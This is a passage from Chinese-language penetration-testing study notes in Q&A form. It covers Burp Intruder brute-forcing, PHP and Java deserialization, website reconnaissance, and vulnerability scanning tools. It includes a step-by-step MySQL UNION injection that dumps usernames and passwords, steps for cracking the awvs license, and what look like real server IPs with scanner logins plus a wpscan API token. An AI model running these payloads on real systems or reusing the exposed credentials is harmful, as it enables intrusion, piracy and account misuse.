set--ๆ‰€ๆœ‰ๅ˜้‡ๅŒๆ—ถๆ”นๅ˜๏ผŒๅŒๆ—ถๅ–ๅˆฐpayloadไธญ็š„ๅ€ผ่ฟ›่กŒ้ๅŽ† Pitchfork -- 2 payload set -- ไธคไธชๅ˜้‡ๅŒๆ—ถๅ–ๅˆฐๅ„่‡ชpayload็›ฎๅฝ•ไธญ็š„็›ธๅŒ็š„ไฝ็ฝฎ็š„่ฝฝไฝ“ Cluster bomp -- 2 payload set -- ๅ…ถไป–ๅ˜้‡ไธๅ˜๏ผŒ็ฌฌไธ€ไธชๅ˜้‡้ๅŽ†่‡ชๅทฑ็š„payload๏ผŒ็„ถๅŽๅ…ถไป–ๅ˜้‡็š„่‡ช่บซ็š„payloadๅพ€ๅŽๆŽจไธ€๏ผŒ็ฑปๆŽจ ``` ###### ๅฆ‚ไฝ•ๅˆฉ็”จburpๅŒๆ—ถๆ”นๅ˜ๅฏ†็ ๅ’Œtoken๏ผŒไธ”tokenๆ˜ฏไปŽ่ฟ”ๅ›žๅŒ…ไธญๆˆชๅ–็š„๏ผŸ ๅœจ็ˆ†็ ดๅฏ†็ ็š„ๆ—ถๅ€™้€‰ๆ‹ฉpitchforkๆจกๅผ๏ผŒๅฏ†็ ไฝœไธบๅ˜้‡๏ผŒๅ…ถๅ†…ๅฎนไธบๆšดๅŠ›็ ด่งฃๅญ—ๅ…ธ tokenๅ€ผไฝœไธบๅ˜้‡๏ผŒ็บฟ็จ‹่ฎพ็ฝฎไธบ1๏ผŒ๏ผˆๅคš็บฟ็จ‹ไธ€ๆฌกๆ“ไฝœๅ‘้€ไบ†ๅคšไธชๆ•ฐๆฎ๏ผŒ่ฟ™ๅคšไธชๆ•ฐๆฎ็š„tokenๅ€ผๆ˜ฏไธๅŒ็š„๏ผ‰๏ผŒๆ‰“ๅผ€ๆœ€ๅบ•้ƒจalways cookiexๅผ€ๅ…ณ๏ผŒgrepๆ‰ฉๅฑ•ไธญ๏ผŒๆ‰พๅˆฐ่‡ชๅทฑ่ฆๆˆช่Žท็š„ๅ‰็ซฏ้กต้ขไธŠ็š„tokenๅ€ผๅนถๅŠ ่ฝฝ ้€‰ๆ‹ฉpayloadsไธญ็š„้€’ๅฝ’ๆœ็ดขRecurisive grepๆจกๅผ๏ผŒๅŠ ่ฝฝๆญคๆˆช่Žท็š„tokenๅ€ผ๏ผŒๅ‘้€ๆ•ฐๆฎๅŒ… ###### burpๅฆ‚ไฝ•ไฝฟ็”จ็ˆฌ่™ซๅŠŸ่ƒฝๅฏน็ฝ‘็ซ™ๆŽขๆต‹ๅนถ่ฟ›่กŒ็ญ›้€‰๏ผŸ burpไธญๅฐ†ๆ•ฐๆฎๅŒ…ๆˆช่Žทไน‹ๅŽๆœ‰ๅ‘้€่‡ณ็ˆฌ่™ซๆจกๅผ๏ผŒๅฝ“ๅ‰้˜ถๆฎต้ข„่งˆ็š„ๆ•ฐๆฎๅŠŸ่ƒฝ่ถณๅคŸๅคš็š„ๆƒ…ๅ†ตไธ‹๏ผŒๅฏไปฅ้€š่ฟ‡็ˆฌ่™ซๆจกๅผ่ฏ†ๅˆซ็ฝ‘็ซ™็š„็›ฎๅฝ•็ป“ๆž„๏ผŒไปฅๅŠๅ…ณ้”ฎไฟกๆฏ็š„่ฟ‡ๆปค๏ผŒๆ นๆฎ็‰นๅฎš็š„ๅ…ณ้”ฎ่ฏๅฏปๆ‰พๆผๆดžใ€‚ ###### burp็š„ๆ‰ซๆๆผๆดžๅŠŸ่ƒฝๅฆ‚ไฝ•๏ผŸ ๅฐ†ๆ•ฐๆฎๅŒ…ๆˆช่ŽทๅคŸๅ‘้€ๅˆฐscanner๏ผŒๅช่ƒฝๆ‰ซๆๅˆฐไธ€ไบ›้žๅธธๆต…็š„ไธœ่ฅฟ๏ผŒไธๆŽจ่ไฝฟ็”จใ€‚ ### 23.ไป€ไนˆๅบๅˆ—ๅŒ–๏ผŒไป€ไนˆๆ˜ฏๅๅบๅˆ—ๅŒ–๏ผŸๆœ‰ไป€ไนˆๅฑๅฎณ๏ผŸ ๅบๅˆ—ๅŒ–ๅฐฑๆ˜ฏๅฐ†ๅฏน่ฑก่ฝฌๅŒ–ไธบๅญ—็ฌฆไธฒ๏ผŒๅๅบๅˆ—ๅŒ–็›ธๅ๏ผŒๆ•ฐๆฎ็š„ๆ ผๅผ็š„่ฝฌๆขๅฏน่ฑก็š„ๅบๅˆ—ๅŒ–ๅˆฉไบŽๅฏน่ฑก็š„ไฟๅญ˜ๅ’Œไผ ่พ“๏ผŒ ๅฑๅฎณ๏ผšSQLๆณจๅ…ฅ๏ผŒไปฃ็ ๆ‰ง่กŒ๏ผŒ็›ฎๅฝ•้ๅŽ† ่„šๆœฌ่ฏญ่จ€ๅบๅˆ—ๅŒ–ๅŽๅ˜ๆˆ ไบŒ่ฟ›ๅˆถ/XML/json ็š„ๅฝขๅผ๏ผŒๅŽ่€…่ฝฌๅŒ–ไธบๅ‰่€…ๆ˜ฏๅๅบๅˆ—ๅŒ– ###### phpไธญๆ— ็ฑปๅญ—็ฌฆๅฆ‚ไฝ•่ฟ›่กŒๅบๅˆ—ๅŒ–ไธŽๅๅบๅˆ—ๅŒ–๏ผŸvar_dump(unseriral($flag))ๆœ‰ไป€ไนˆไฝœ็”จ๏ผŸ ``` <?php $KEY='i:123'; echo unserialize($KEY); //่ฟ™ๆ˜ฏๅๅบๅˆ—ๅŒ–jsonๆ ผๅผ่ฝฌๅŒ–ๆˆๅฏน่ฑกๆ ผๅผ ?> ๅฝ“็„ถ๏ผŒไนŸๅฏไปฅๆญฃๅ‘่ฟ่กŒ๏ผŒๆ‹ฟๅˆฐๅบๅˆ—ๅŒ–ๅŽ็š„ๅ€ผ๏ผŒๅœจไปฃๅ…ฅๅˆฐๆญคไปฃ็ ไธญๅๅบๅˆ—ๅŒ–ๅณๅฏ <?php $KEY='IServer:www.isecer.com'; echo serialize($KEY); //่ฟ™ๆ˜ฏๅบๅˆ—ๅŒ–่ฝฌๅŒ–ๆˆjsonๆ ผๅผ ?> var_dump(unseriral($flag))ๅฏไปฅๅฐ†ไธ€ไธชๅๅบๅˆ—ๅŒ–ๅŽ็š„็ฑป็š„ๅ€ผๆ‰“ๅฐๅ‡บๆฅ ``` ###### ๅฆ‚ไฝ•็ฏกๆ”นๆ•ฐๆฎๅŒ…ไธญ็š„ๆ•ฐๆฎ๏ผŒๆœ‰ๅ“ชๅ‡ ็งๆ–นๆณ•๏ผŸ ้€š่ฟ‡ๆต่งˆๅ™จๆ’ไปถ๏ผŒๆˆ–่€…burp๏ผŒๆˆ–่€…ๅ…ถไป–ไปฃ็†่ฝฏไปถใ€‚ ###### ไปฃ็ ็š„ๆ‰ง่กŒ้กบๅบๅฏนๆผๆดž็š„ไบง็”Ÿๆœ‰ไป€ไนˆๅฝฑๅ“๏ผŸ ๆณจๆ„ๆŸไบ›ๅ˜้‡็š„่ต‹ๅ€ผ้กบๅบ๏ผŒ่ต‹ๅ€ผๅœจๅŽ๏ผŒๅœจไธบ็ฉบ๏ผŒๅฏ่ƒฝไผšๅฏน็ ด่งฃ้€ ๆˆไธ€ๅฎš็š„ๅนฒๆ‰ฐใ€‚ ###### phpไธญๆœ‰็ฑป็š„ๅๅบๅˆ—ๅŒ–ไธญๅ‡ ไธชๅธธ่ง็š„้ญ”ๆœฏๆ–นๆณ•๏ผŸๅฆ‚ไฝ•่งฆๅ‘๏ผŸ ``` _construct()//ๅˆ›ๅปบๅฏน่ฑกๆ—ถ่งฆๅ‘ __destruct() //ๅฏน่ฑก่ขซ้”€ๆฏๆ—ถ่งฆๅ‘ __wakeup()๏ผŒๆ‰ง่กŒunserialize()ๆ—ถ๏ผŒๅ…ˆไผš่ฐƒ็”จ่ฟ™ไธชๅ‡ฝๆ•ฐ ``` ###### phpไธญไธคไธช็ญ‰ไบŽไธŽไธ‰ไธช็ญ‰ไบŽๅท็š„ๅŒบๅˆซๅœจๅ“ช้‡Œ๏ผŸ ไธคไธช็ญ‰ไบŽๅทๅนถไธๆ˜ฏไธฅๆ ผๆ„ไน‰ไธŠ็š„็ญ‰ไบŽ๏ผŒๆฏ”ๅฆ‚โ€˜ 2โ€™==โ€˜2โ€™ ่€Œไธ‰ไธช็ญ‰ไบŽๅทๅฟ…้กปๆ˜ฏไธฅๆ ผๆ„ไน‰ไธŠ็š„็ญ‰ไบŽ๏ผŒๆฏ”ๅฆ‚โ€˜3โ€™===โ€˜3โ€™ ###### phpๅๅบๅˆ—ๅŒ–ๆผๆดžไบง็”Ÿ็š„ๅŽŸๅ› ๆ˜ฏไป€ไนˆ๏ผŒๅฆ‚ไฝ•ๅˆฉ็”จ่ฟ™ไธชๆผๆดž๏ผŸ phpไธญๆœ‰ไธ€ไบ›้ญ”ๆœฏๆ–นๆณ•๏ผŒๅœจๅฎžไพ‹ๅŒ–ๆ—ถๅŽ่€…ๅ…ถไป–ๆ“ไฝœๆ—ถไธ็ปๆ„้—ดๅ‡บๅ‘ไบ†็ฑปไธญ็š„ๆ–นๆณ•๏ผŒๅฏไปฅๅˆฉ็”จ่ฟ™ไธช็‰น็‚น๏ผŒๅฐ†่‡ชๅทฑไผช้€ ็š„ๆ•ฐๆฎๅธฆๅ…ฅๅ…ถไธญ๏ผŒ่ฎฉ่‡ชๅทฑไผช้€ ็š„ๆ•ฐๆฎๅๅบๅˆ—ๅŒ–ๅŽๅฏไปฅ่ฏปๅ–ๅญ˜ๅ‚จๅœจ็ฑปไธญ้ญ”ๆœฏๆ–นๆณ•ไธญ็š„ๆ•ฐๆฎ ###### ๅฆ‚ๆžœๅ‚ๆ•ฐๆ˜ฏไธ€ไธช็ฑป๏ผŒๅฆ‚ไฝ•้€š่ฟ‡ๅๅบๅˆ—ๅŒ–ๆฅไผ ่ฟ™ไธช็ฑป๏ผŸ ้œ€่ฆ้‡ๅ†™่ฟ™ไธช็ฑป๏ผŒๅนถไธ”ๅฐ†ๆ‰€ๆœ‰็š„ๅ˜้‡ๆŒ‰็…ง่‡ชๅทฑ็ ด่งฃ็š„่ง„่Œƒ่ฟ›่กŒไนฆๅ†™๏ผŒๆœ€ๅŽ่ฟ›่กŒๅฎžไพ‹ๅŒ– ### 24.java็š„ๅบๅˆ—ๅŒ–ๅ’Œๅๅบๅˆ—ๅŒ–๏ผŸ writeobjectๅ…ˆ่ฝฌๅŒ–ไธบjson๏ผŒๅœจreadwrite่ฝฌๅŒ–ไธบๅฏน่ฑก๏ผŒไธญ้—ดๆœ‰ๅ‡ฝๆ•ฐ Runtime.getRuntime().exe c(this.taskAction); ่ฐƒ็”จไบ†็ณป็ปŸๅ‘ฝไปค ๅบๅˆ—ๅŒ–๏ผšๅฐ†ๅฏน่ฑก่ฝฌๅŒ–ไธบๅญ—่Š‚็š„่ฟ‡็จ‹็งฐไธบๅบๅˆ—ๅŒ–่ฟ‡็จ‹ใ€‚ ๅๅบๅˆ—ๅŒ–๏ผšๅฐ†ๅญ—่Š‚่ฝฌๅŒ–ไธบๅฏน่ฑก็š„่ฟ‡็จ‹็งฐไธบๅๅบๅˆ—ๅŒ–ใ€‚ ###### javaๅๅบๅˆ—ๅŒ–ๆผๆดžไบง็”Ÿ็š„ๅŽŸๅ› ๏ผŸๅฆ‚ไฝ•ๅˆฉ็”จ๏ผŸ็”Ÿๆˆpayload็š„ๅŽŸ็†ๆ˜ฏไป€ไนˆ๏ผŸ ๆผๆดžไบง็”Ÿ็š„ๅŽŸๅ› ๅฐฑๅœจไบŽๆ•ฐๆฎๆ‰ง่กŒไบ†็ณป็ปŸๅ‘ฝไปค๏ผŒๅนถไธ”่ฟ™ไธชๅ‚ๆ•ฐๅบๅˆ—ๅŒ–ๅŽๅฏไปฅไบบไธบ็š„่ฟ›่กŒๆŽงๅˆถใ€‚ ###### jarๆ–‡ไปถๆ€Žไนˆๅ็ผ–่ฏ‘๏ผŒๆ–นไพฟๅฎก่ฎกไปฃ็ ๏ผŸ ้€š่ฟ‡jd-juiๆˆ–่€…็›ธๅบ”็š„java็š„ideaๅทฅๅ…ท่ฟ›่กŒๅ็ผ–่ฏ‘่Žทๅ–ๆบ็ ใ€‚ ###### ysosersialๆ€Žไนˆ็”Ÿๆˆๅๅผนshell ็š„payload๏ผŸๆต็จ‹ๆ˜ฏไป€ไนˆ๏ผŸไธบไป€ไนˆๅๅผน๏ผŒ่งฃๅ†ณไบ†ไป€ไนˆ้—ฎ้ข˜๏ผˆไธๅ›žๆ˜พ๏ผ‰๏ผŸ ๅŽŸๅง‹ๆ•ฐๆฎ->ๅบๅˆ—ๅŒ–writeobject->base64็ผ–็ ->ไผ ่พ“->base64่งฃ็ ->ๅๅบๅˆ—ๅŒ–readobject->ๆœ€็ปˆๆ•ฐๆฎ ๅๅผน็š„ไฝœ็”จๅœจไบŽๅณไพฟๆˆๅŠŸ็š„ๆ‰ง่กŒไบ†็›ธๅ…ณ็ณป็ปŸๅ‘ฝไปค๏ผŒไนŸไธ่ƒฝๆŽฅๅ—ๅˆฐ็›ธๅบ”็š„ๅ›žๆ˜พ๏ผŒๆ‰€ไปฅ้œ€่ฆๅๅผนshell ###### ๅฆ‚ไฝ•ๅŒบๅˆซbase64็ผ–็ ๅ’Œๅๅ…ญ่ฟ›ๅˆถ็ผ–็ ็š„javaๅบๅˆ—ๅŒ–ๅŽ็š„ๆ•ฐๆฎ๏ผŸๅฆ‚ไฝ•ๅˆคๅฎšๆ˜ฏๅฆๆ˜ฏๅบๅˆ—ๅŒ–ๆ“ไฝœ๏ผŸ ไธ€ๆฎตๆ•ฐๆฎไปฅrO0ABๅผ€ๅคด๏ผŒๅŸบๆœฌๅฏไปฅ็กฎๅฎš่ฟ™ไธฒๅฐฑๆ˜ฏJAVAๅบๅˆ—ๅŒ–base64ๅŠ ๅฏ†็š„ๆ•ฐๆฎ ๆˆ–่€…ๅฆ‚ๆžœไปฅacedๅผ€ๅคด๏ผŒ้‚ฃไนˆไป–ๅฐฑๆ˜ฏ่ฟ™ไธ€ๆฎตjavaๅบๅˆ—ๅŒ–็š„16่ฟ›ๅˆถ ๅช่ฆๆ˜ฏๅผ€ๅคดๆ˜ฏ่ฟ™ๆ ท็š„ๆ•ฐๆฎ๏ผŒๅฐฑๅฏไปฅ่ฎคไธบ่ฟ™ๆ˜ฏjava็š„ๅๅบๅˆ—ๅŒ–ใ€‚ ###### swaggerๆ˜ฏjava็š„ไป€ไนˆ๏ผŸ ๆ˜ฏไธ“้—จ็”จๆฅๆžjavaๅผ€ๅ‘็š„ไธ€ไธช็ฎก็†UI็•Œ้ข็š„ไธ€ไธชๆจกๅ—๏ผŒ่ฟ™ไธช็•Œ้ขๆ˜ฏๅๅบๅˆ—ๅŒ–ๆผๆดžไบง็”Ÿ็š„ๆœ‰ๅ…ณ็š„ใ€‚ ๅฏไปฅ้€š่ฟ‡่ฟ™ไธช็ป„ไปถ็š„็•Œ้ขๅŽป็ฎก็†java็š„ๅๅบๅˆ—ๅŒ–ๅŽ็š„็›ธๅ…ณๆ•ฐๆฎใ€‚ ###### ๅฆ‚ไฝ•ๅฏปๆ‰พjavaๅๅบๅˆ—ๅŒ–ๆผๆดž๏ผŸ ๆ นๆฎ็›ธๅ…ณ็š„ๅ…ณ้”ฎ่ฏไฟกๆฏ่ฟ›่กŒ็ญ›้€‰๏ผŒๅˆคๆ–ญๆ˜ฏๅฆๅญ˜ๅœจๅฏไปฅ่พ“ๅ…ฅๅบๅˆ—ๅŒ–ๅŽ็š„ๅ€ผ็š„ๅœฐๆ–นใ€‚ ### 25.ๆ‹ฟๅˆฐไธ€ไธช็ฝ‘็ซ™ไน‹ๅŽๅบ”่ฏฅๆ€Žไนˆๆ”ปๅ‡ป๏ผŸ ###### ็ฝ‘็ซ™ๆญๅปบไน ๆƒฏ ็›ฎๅฝ•ๅž‹ๅท ๏ผš ไธ€ไธช็ฝ‘็ซ™้‡Œ่พนๆœ‰ไธ€ๅฅ—CMS๏ผŒๅ…ถๅญ็›ฎๅฝ•้‡Œ่พนๆœ‰ๅฆๅค–ไธ€ๅฅ—CMS ็ซฏๅฃๅž‹ๅท๏ผš้™คไบ†80็ซฏๅฃ็š„ๅ…ถไป–็ซฏๅฃๆœ‰ๅ…ถไป–็š„CMS ๅญๅŸŸๅ๏ผšๅŒๅฑžไบŽๅŒไธ€ไธช้กถ็บงๅŸŸๅไธ‹็š„ๅ…ถไฝ™ๅญๅŸŸๅ ็ฑปไผผๅŸŸๅ๏ผšๅŒไธ€ๅฎถๅ…ฌๅธ็š„็›ธไผผ็š„ๅŸŸๅ ๆ—ๆณจ๏ผšๅŒไธ€ๆœๅŠกๅ™จไธ‹็š„ๅคšไธชๅŸŸๅ Cๆฎต๏ผšๅŒไธ€็ฝ‘ๆฎตใ€ไธๅŒๆœๅŠกๅ™จไธ‹็š„ๅŸŸๅ ###### ็ฝ‘็ซ™ๆธ—้€ๆ€่ทฏ ็ซฏๅฃ+ๅŸŸๅ+ๅ…ณ้”ฎ่ฏ+ๅค‡ๆกˆ+robots ``` ไฟกๆฏๆ”ถ้›†็š„ๆ“ไฝœ------ ็›ดๆŽฅ็”จ้ป‘ๆš—ๅผ•ๆ“Žๆœ็ดขๅŸŸๅ๏ผšๅพ—ๅˆฐ็›ธๅ…ณ็ซฏๅฃไฟกๆฏ ๆœ็ดข็›ธๅ…ณๅญๅŸŸๅ็š„ไฟกๆฏ๏ผš่ฐทๆญŒ/ๅœจ็บฟๅทฅๅ…ท/layer ็”จnmap่ฟ›ไธ€ๆญฅ่Žทๅ–ไฟกๆฏ๏ผšๅ„ไธช็ซฏๅฃๆ˜ฏๅฆๆœ‰ๆผๆดž ็ˆ†ๅ‡บๆœๅŠก็‰ˆๆœฌๅŽ๏ผšๅœจๅ„ๅคงๆผๆดžๅนณๅฐๆŸฅ่ฏขๆญคๆผๆดžๆ˜ฏๅฆๅญ˜ๅœจ่ฟ‡็›ธๅ…ณๆผๆดž ๅค‡ๆกˆไฟกๆฏๆŸฅ่ฏข๏ผš้€š่ฟ‡ๅค‡ๆกˆไฟกๆฏๆŸฅ็œ‹ๆ˜ฏๅฆๆณจๅ†Œ่ฟ‡ๅ…ถไป–ๅŸŸๅ ๅ…ถไป–ๅŸŸๅ็š„ไฟกๆฏๆ”ถ้›†๏ผšๅœจ้ป‘ๆš—ๅผ•ๆ“ŽไธŠๆœ็ดข็›ธๅ…ณ็š„ๅŸŸๅ ๅœจ่ฐทๆญŒไธŠๆœ็ดข๏ผšๅ…ฌๅธไฟกๆฏๅŠๅŸŸๅไธญ็š„็›ธๅ…ณๅ…ณ้”ฎ่ฏ ๅœจ็ฝ‘็ซ™ไธŠ็š„ๆ“ไฝœ๏ผš่ทŸไธŠrobots.txtๆŸฅๆ‰พ็ˆฌ่™ซๅ่ฎฎ๏ผŒๅผบๅˆถๆŠฅ้”™็œ‹้กต้ขๅ›žๆ˜พ CMS็š„่ฏ†ๅˆซ๏ผšๆŸฅ่ฏขๆฏไธช็ฝ‘็ซ™็›ฎๅฝ•็š„CMSๆ”ปๅ‡ปๅฑ‚้ข ๅนถไธ”ๅพช็Žฏ่ฟ™ไธชๆต‹่ฏ•ๆญฅ้ชคโ€ฆโ€ฆโ€ฆโ€ฆโ€ฆโ€ฆ ``` ###### mysqlๆณจๅ…ฅๆต็จ‹ ไปŽไธŠ่‡ณไธ‹๏ผŒ้€็บงๆธ—้€๏ผšๆ•ฐๆฎๅบ“ๅ-่กจๅ-ๅˆ—ๅ-ๆ•ฐๆฎ-...... ็Œœ่งฃๅˆ—ๅ๏ผš id=1 order by 1 id=1 order by 2 ..... id=1 order by 4 ็Œœๅˆฐไธด็•Œ็‚นๅฏๅพ—้”™่ฏฏ้กต ๆŠฅ้”™็Œœ่งฃๅ‡†ๅค‡๏ผš id=1 union select 1,2,3,4 id=1 and 1=1 union select 1,2,3,4 ็ˆ†ๅ‡บไธ€ไธชๆ•ฐๅญ—็š„้”™่ฏฏ ๆˆ–่€…id=-1 union select 1,2,3,4 ๆ นๆฎๆŠฅ้”™็š„ๆ•ฐๅญ—ๆŸฅ่ฏข๏ผš(ๅฆ‚่ฟ™้‡Œๆœ‰2๏ผŒ3) id=-1 union select 1,database(),version(),4 id=-1 union select 1,user(),@@version_compile_os,4 ๆŸฅ่ฏขๆŒ‡ๅฎšๆ•ฐๆฎๅบ“ไธ‹็š„่กจๅไฟกๆฏ๏ผš id =1 union select 1,table_name,group_concat(table_name),4 from infomation_schema.tables where table_schema='mozhe_Discuz_StormGroup' ๆŸฅ่ฏขๆŒ‡ๅฎš่กจๅไธ‹็š„ๅˆ—ๅไฟกๆฏ๏ผš id =1 union select 1,table_name,group_concat(column_name),4 from infomation_schema.columns where table_name='StormGroup_name' ๆŸฅ่ฏขๆŒ‡ๅฎšๆ•ฐๆฎ๏ผš id =1 union select 1,name,passwd,4 from StormGroup_name ็ ด่งฃๅŠ ๅฏ†ไฟกๆฏ๏ผš md5่งฃๅฏ†ๆˆ–่€…ๅ…ถไป–็š„่ฟ›่กŒ่งฃๅฏ†ๆŸฅ่ฏขๆœ€็ปˆๅฏ†็  ``` information_schema.schemata;่ฎฐๅฝ•ๆ‰€ๆœ‰็š„ๆ•ฐๆฎๅบ“ๅ information_schema.tables ่ฎฐๅฝ•ๆ‰€ๆœ‰่กจๅไฟกๆฏ็š„่กจ information_schema.columns ่ฎฐๅฝ•ๆ‰€ๆœ‰ๅˆ—ๅไฟกๆฏ็š„่กจ table_name ่กจๅ column_name ๅˆ—ๅ ``` ### 26.็ณป็ปŸๆผๆดžๆ‰ซๆๆœ‰ไป€ไนˆๆ„ไน‰๏ผŒๅฏไปฅ้‡‡ๅ–ๅ“ชไบ›่ฝฏไปถ๏ผŸ ็ฝ‘็ซ™ๅฏ„็”ŸๅœจๆœๅŠกๅ™จไธŠ่พน๏ผŒๅฆ‚ๆžœๆœๅŠกๅ™จๆœ‰ๆผๆดž๏ผŒๅฏไปฅ็›ดๆŽฅ้€š่ฟ‡ๆœๅŠกๅ™จ็š„ๆผๆดž่Žทๅ–ๅˆฐ็ฝ‘็ซ™็š„ๆƒ้™ใ€‚ ๆœ‰ๅฟ่€…ๆธ—้€็ณป็ปŸไธญ็š„goby๏ผŒไปฅๅŠnmapๆ‰ซๆๆผๆดž๏ผŒไปฅๅŠnessusๆ‰ซๆ็ณป็ปŸๆผๆดž๏ผŒๅ…ถไธญnessusๆฏ”่พƒๅฅฝไฝฟใ€‚ ###### ๆ‰ซๆๅˆฐๆผๆดžไน‹ๅŽๆ€Žไนˆๅˆฉ็”จ๏ผŒๆ€Žไนˆๅฏปๆ‰พEXP๏ผŸ ๅทฅๅ…ทๆก†ๆžถ๏ผšmsf(aux่กจ็คบ้ชŒ่ฏ,search,use,show options,set ,run)๏ผŒsearchexploit ๅ•็‚นPOC๏ผšCNDV๏ผŒseebug๏ผŒexploit-db๏ผŒ0day ๆ–‡็ซ ๅค็Žฐ๏ผš็ป“ๅˆ็ฝ‘็ปœไธŠๅญ˜ๅœจ็š„็›ธๅ…ณไฟกๆฏ๏ผŒๆˆ–่€…ๅœจgithubไธŠๅฏปๆ‰พexp ###### exploitdb ๆœ็ดข็›ธๅ…ณ็š„ๆผๆดžๆ˜ฏๅฆๅญ˜ๅœจ ./searchsploit blue ๅฏไปฅๅพˆไพฟๆท็š„ๆœ็ดขๅˆฐๆ˜ฏๅฆๅญ˜ๅœจ็›ธๅ…ณ็š„ๆผๆดž,expๅฐฑๅœจๅฏนๅบ”็›ฎๅฝ•้‡Œ่พน ๆˆ–่€…ๅœจhttps://www.exploit-db.com/ไธญ่ฟ›่กŒๆœ็ดข ๆ˜ฏๅ›ฝๅค–็š„ไบบๅ†™ๅ‡บๆฅ็š„๏ผŒๅฏนๅ›ฝๅ†…ไธๅ‡บๅ็š„cmsไธๆ•ๆ„Ÿ ###### ๅฆ‚ไฝ•ไฟฎๅค่ฟ™ไบ›ๆผๆดž๏ผŸ ๆ‰“ไธŠๅฎ˜ๆ–นๅ…ฌๅผ€็š„่กฅไธ๏ผŒๅ…ณ้—ญๆผๆดžไบง็”Ÿ็š„ๅ…ฅๅฃ๏ผŒ้ƒจ็ฝฒ็›ธๅ…ณWAF๏ผŒๆžๅˆฐ่“้˜Ÿ็š„ๆญฆๅ™จใ€‚ ###### ๅฆ‚ไฝ•ไฝฟ็”จnessus่ฟ›่กŒ็ณป็ปŸๆผๆดž็š„ๅ‘็Žฐ leishianquan/awvs-nessus ๆผๆดžๅ‘็Žฐ ``` docker pull leishianquan/awvs-nessus docker run -it -d --name="awvs-nessus" -p 13444:3443 -p 13445:8834 leishianquan/awvs-nessus:v4 docker exec โ€“it `docker ps | grep nessus | awk '{print $1}'` /bin/bash /etc/init.d/nessusd start ``` awvs ``` cp /home/license_info.json /home/acunetix/.acunetix/data/license/ ็ ด่งฃawvs๏ผš chmod 444 license_info.json ๅœจawvs่ฟ่กŒ่ฟ‡็จ‹ไธญ๏ผŒlicense_info.jsonๆ–‡ไปถไผš่ขซๆŒ็ปญ่ฆ†็›–้€ ๆˆ็ ด่งฃๆ— ๆ•ˆ ๅœจๆ‰ง่กŒๅฎŒcpๅ‘ฝไปค, ๅฐ†license_info.json่ฎพ็ฝฎไธบๅช่ฏปๅณๅฏ https://110.42.178.227:13444/ awvs13 username: [email protected] awvs13 password: Leishi123 https://110.42.178.227:13445/ nessus username:leishi nessus password :leishianquan ``` ### 27.webๆผๆดžๅฆ‚ไฝ•ๆ‰ซๆ๏ผŸๆœ‰ไป€ไนˆๅฅฝๅŠžๆณ•๏ผŸ ๅทฒ็Ÿฅcms๏ผšๆผๆดžๅนณๅฐๆ‰ซๆ๏ผˆexploit-db๏ผŒseebug๏ผŒcnvd๏ผŒ0day๏ผ‰๏ผŒcmsๆ‰ซๆๅทฅๅ…ท๏ผˆcmsscan๏ผŒwpscan๏ผŒtpscan๏ผŒjoomscan๏ผŒdrupalscan๏ผ‰๏ผŒไปฃ็ ๅฎก่ฎก๏ผˆๅ‡ฝๆ•ฐ็‚นๆŒ–ๆŽ˜๏ผŒๅŠŸ่ƒฝ็‚นๆŒ–ๆŽ˜๏ผŒๆก†ๆžถ็ฑปๆŒ–ๆŽ˜๏ผ‰ ๅผ€ๅ‘ๆก†ๆžถ๏ผšPHP๏ผˆthinkphp๏ผ‰๏ผŒjava๏ผˆshiro๏ผŒstruts๏ผŒspring๏ผŒmaven๏ผ‰๏ผŒpython๏ผˆdjango๏ผŒflask๏ผ‰ ๆœช็Ÿฅcms๏ผšๅทฅๅ…ท๏ผˆxray๏ผŒawvs๏ผŒappscan๏ผ‰๏ผŒไบบๅทฅๆŽข้’ˆ๏ผˆๅบ”็”จๅŠŸ่ƒฝ๏ผŒURLๅ‚ๆ•ฐ๏ผŒ็›ฒ็Œœๆต‹่ฏ•๏ผ‰ ###### ๅฆ‚ไฝ•็กฎ่ฎคๅฏนๆ–น็š„ๆก†ๆžถ๏ผŸ็กฎ่ฎคไน‹ๅŽๆ€Žไนˆๅˆฉ็”จ๏ผŸ ้€š่ฟ‡ๆŠฅ้”™็œ‹ๆ˜ฏๅฆๆœ‰็›ธๅบ”็š„ๆก†ๆžถไฟกๆฏ่ขซๆšด้œฒๅ‡บๆฅ๏ผŒๆˆ–่€…ๆŠ“ๅ–ๆ•ฐๆฎๅŒ…็œ‹่ƒฝๅฆ็œ‹ๅˆฐserver ๆˆ–่€…ๅฐ†ๆ•ฐๆฎๅŒ…ไธญๆฏ”่พƒ็‰นๆฎŠ็š„urlๅคๅˆถๅ‡บๆฅ๏ผŒๅœจ้ป‘ๆš—ๅผ•ๆ“ŽไธŠๆœ็ดขๅ…ถไป–ๅฏไปฅ้€š่ฟ‡ๆŠฅ้”™็œ‹ๅˆฐๆก†ๆžถไฟกๆฏ็š„็ฝ‘ๅ€ ้€š่ฟ‡่ฟ™ไบ›ๆ–นๆณ•ๆ‰พๅ‡บๆฅๆก†ๆžถไน‹ๅŽๅœจ้’ˆๅฏนๆก†ๆžถ่ฟ›่กŒๆผๆดžๅˆฉ็”จ ๅฆ‚ๅฏไปฅ้€š่ฟ‡thinkphp่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๅทฅๅ…ท็›ดๆŽฅไธ€ๆญฅๆฃ€ๆต‹๏ผŒๆผๆดžๅนณๅฐๆŸฅๆ‰พ๏ผŒๆˆ–่€…ๆ–‡็ซ ๅค็Žฐๆˆ–่€…vulhubๅฏปๆ‰พ ###### ๅฆ‚ไฝ•็กฎๅฎšๅฏนๆ–น้‡‡็”จ็š„cms๏ผŸๆ€Žไนˆๅˆฉ็”จ๏ผŸ ็”จๅœจ็บฟๅทฅๅ…ท็›ดๆŽฅๆœ็ดข๏ผŒ็”จ่ฐทๆญŒ็š„ๆ’ไปถ่พ…ๅŠฉ่ฏ†ๅˆซ๏ผŒ็”จๆ•ฐๆฎๅŒ…ไธญ็‰นๆฎŠ็š„urlๅœฐๅ€่ฟ›่กŒๆœ็ดข๏ผŒ็œ‹็ฝ‘็ซ™็š„็‰นๆฎŠไฝ็ฝฎไบบๅทฅ่ฏ†ๅˆซ ๅœจๆผๆดžๅนณๅฐไธŠๆœ็ดข๏ผŒๅˆฉ็”จ่ฟ™ไธชcms็‰นๅฎšๅทฅๅ…ท่ฟ›่กŒๆž๏ผŒๆˆ–่€…ๆ–‡็ซ ๅค็Žฐ็ญ‰ๆฅๅˆฉ็”จ ๅฆ‚ๅˆฉ็”จwpscan้’ˆๅฏนwordpress็š„ๆผๆดž่ฟ›่กŒๅˆฉ็”จ gem install wpscan wpscan --url http://1.117.52.219:8000/ --api-token eG5iT4ooiuP7eVJVedsHhlgx8xeZHmAJjBr13asnjEc 